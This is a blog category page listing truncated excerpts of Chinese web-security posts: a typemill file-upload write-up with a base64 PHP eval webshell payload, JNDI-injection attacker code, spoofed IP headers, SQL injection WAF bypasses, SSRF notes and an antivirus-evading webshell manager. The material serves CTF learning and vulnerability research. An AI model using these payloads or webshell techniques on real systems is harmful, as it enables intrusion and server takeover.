![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web安全
文章平均质量分 69
b1ackc4t
这个作者很懒,什么都没留下…
展开
-
turbo intruder常用脚本
11111原创 2022-07-03 14:19:42 · 1908 阅读 · 0 评论 -
本科毕设CTF平台-MarsCTF
Vue+Springboot开发的CTF学习平台,提供动态靶机、学习模块、writeup模块等等CTF平台的核心功能。提供docker版本。演示视频:https://www.bilibili.com/video/BV1eA4y1o73CTips: 前后端分离项目,本仓库为后端,前端仓库在https://github.com/b1ackc4t/MarsCTF-client初始管理员用户名/密码:admin/123456下载 https://github.com/b1ackc4t/MarsCTF/release原创 2022-06-07 13:26:41 · 2893 阅读 · 7 评论 -
14Finger-全能web指纹识别与分享平台
14Finger功能齐全的Web指纹扫描和分享平台,基于vue3+django前后端分离的web架构,并集成了长亭出品的rad爬虫的功能,内置了一万多条互联网开源的指纹信息。Github:https://github.com/b1ackc4t/14Finger特点基于强大的rad爬虫分析指纹,不局限于当前页面能够执行js脚本,动态js加载的应用也能扫描,比如Vue应用多线程,多进程,速度尚可人性化的指纹提交功能,指纹种类和信息划分精细,可供用户打造出自己的无敌指纹库批量爬虫、批量指纹,均原创 2022-05-15 22:59:03 · 1344 阅读 · 1 评论 -
代码审计typemill 任意文件上传漏洞
漏洞描述攻击者在后台发文章的附件处可以通过特殊的payload绕过预先设定的白名单,并且成功上传php文件渗透过程先把一句话木马进行base64随便传个文件抓一下上传的包,发到repeater构造如下payload,把一句话木马的base64放进file字段逗号后面即可{ "url":"/", "file":"xxx;base64,PD9waHAgQGV2YWwoJF9QT1NUW2FudF0pOw==", "name":"shell.php", "csrf_name":"csrf6原创 2022-03-19 22:41:19 · 143 阅读 · 0 评论 -
渗透测试-信息收集的常规步骤-checklist
信息收集的常规步骤、checklist原创 2022-03-17 10:46:50 · 485 阅读 · 0 评论 -
tomcat下jdk高版本的JNDI注入解析
前言经典的JNDI注入在jdk8u191以上的版本默认被限制了加载远程工厂类,但可以通过加载一些特殊的本地工厂,达到执行命令的效果比如常见的tomcat依赖里的BeanFactory就能实现类似的效果经典payload服务端package org.example.rmi;import com.sun.jndi.rmi.registry.ReferenceWrapper;import javax.naming.NamingException;import javax.naming.Refe原创 2022-03-12 19:37:23 · 520 阅读 · 0 评论 -
JNDI注入 Reference + RMI 打开了rmi.object.trustURLCodebase还是失败
前情提要服务端(攻击者)package org.example.rmi;import com.sun.jndi.rmi.registry.ReferenceWrapper;import javax.naming.NamingException;import javax.naming.Reference;import java.rmi.AlreadyBoundException;import java.rmi.RemoteException;import java.rmi.registry原创 2022-03-11 20:08:31 · 905 阅读 · 1 评论 -
CTF 用于伪造ip的http请求头
X-Forwarded-For:127.0.0.1Client-ip:127.0.0.1X-Client-IP:127.0.0.1X-Remote-IP:127.0.0.1X-Rriginating-IP:127.0.0.1X-Remote-addr:127.0.0.1HTTP_CLIENT_IP:127.0.0.1X-Real-IP:127.0.0.1X-Originating-IP:127.0.0.1via:127.0.0.1原创 2022-02-22 18:19:57 · 2655 阅读 · 1 评论 -
mysql注入绕过information_schema过滤
1.利用mysql5.7新增的sys.schema_auto_increment_columns 这是sys数据库下的一个视图,基础数据来自与information_schema,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名以下为该视图的所有列2.sys.schema_table_statistics_with_buffer 这是sys数据库下的视图,里面存储着所有数据库所有表的统计信息 ...原创 2020-10-19 14:20:09 · 5701 阅读 · 1 评论 -
Mysql注入绕过WAF总结
Mysql注入绕过WAF总结过滤等于号select * from user where id = 2;select * from user where id like 2;select * from user where id rlike 2;select * from user where id regexp 2;select * from user where id > 1 and id < 3;select * from user where !id <> 2;原创 2022-01-24 09:50:00 · 2688 阅读 · 0 评论 -
Mysql盲注总结
Mysql盲注当我们无法从显示的页面上直接获取SQL语句的执行结果时,需要进行盲注手工盲注的基本步骤判断是否存在注入 字符型还是数值型猜解当前数据库名猜解数据库的表名猜解表中的字段名猜解数据下面,我们探讨一下常见的三种盲注基于报错的盲注利用条件系统未关闭数据库报错信息,对于一些sql错误直接回显在了错误上未对报错函数进行过滤group by key报错原理当在一个聚合函数,比如CONUNT函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来, co原创 2022-01-24 09:49:19 · 2895 阅读 · 0 评论 -
SSRF漏洞以及其WAF绕过总结
SSRF基本介绍SSRF(Server-Side Request Forgery),服务器端请求伪造,利用漏洞伪造服务端发起请求,从而突破客户端获取不到数据的限制常见存在SSRF的功能点在线翻译图片加载下载服务网站采集文件包含预览内容转码收藏分享多媒体加载在线编程api demo站长工具扫一扫markdown浏览常见判断方法有回显有延时 比如?url=www.google.com,有大量延时,而访问有的很快,有差异外带请求 可以利用dnslog平台测试(htt原创 2022-01-24 09:47:36 · 3407 阅读 · 0 评论 -
CTF web安全45天入门学习路线
前言因为最近在准备开发CTF学习平台,先做一个学习路线的整理,顺便也是对想学web的学弟学妹的一些建议。学习路线初期刚刚走进大学,入了web安全的坑,面对诸多漏洞必然是迷茫的,这时的首要任务就是打好网站开发的基础,曾有伟人说过-“自己不会做网站,何谈去找网站的漏洞”,在学习漏洞前,了解基本网站架构、基础网站开发原理,基础的前后端知识,能够让你之后的漏洞学习畅通无阻。html+css+js(2-3天)前端三要素 html、css、js是被浏览器解析的代码,是构成静态页面的基础。也是前端漏洞如xss原创 2022-01-23 18:43:02 · 7466 阅读 · 1 评论 -
Assassin暗杀者-自用短小精悍的webshell管理工具分享
AssassinAssassin是一款精简的基于命令行的webshell管理工具,它有着多种payload发送方式和编码方式,以及精简的payload代码,使得它成为隐蔽的暗杀者,难以被很好的防御。自用工具开源互相学习,工具短小精悍,生成的webshell能够过目前主流杀毒软件(36x、腾x等,目前能过,后面可能很快就不行了,需要稍微变换webshell代码以再次免杀) 连接后交互的流量特征几乎没有,具体payload发送方式均可自定义。由于个人精力有限,因为懒而且菜,服务端暂时仅支持Java。G原创 2021-11-24 20:28:37 · 275 阅读 · 1 评论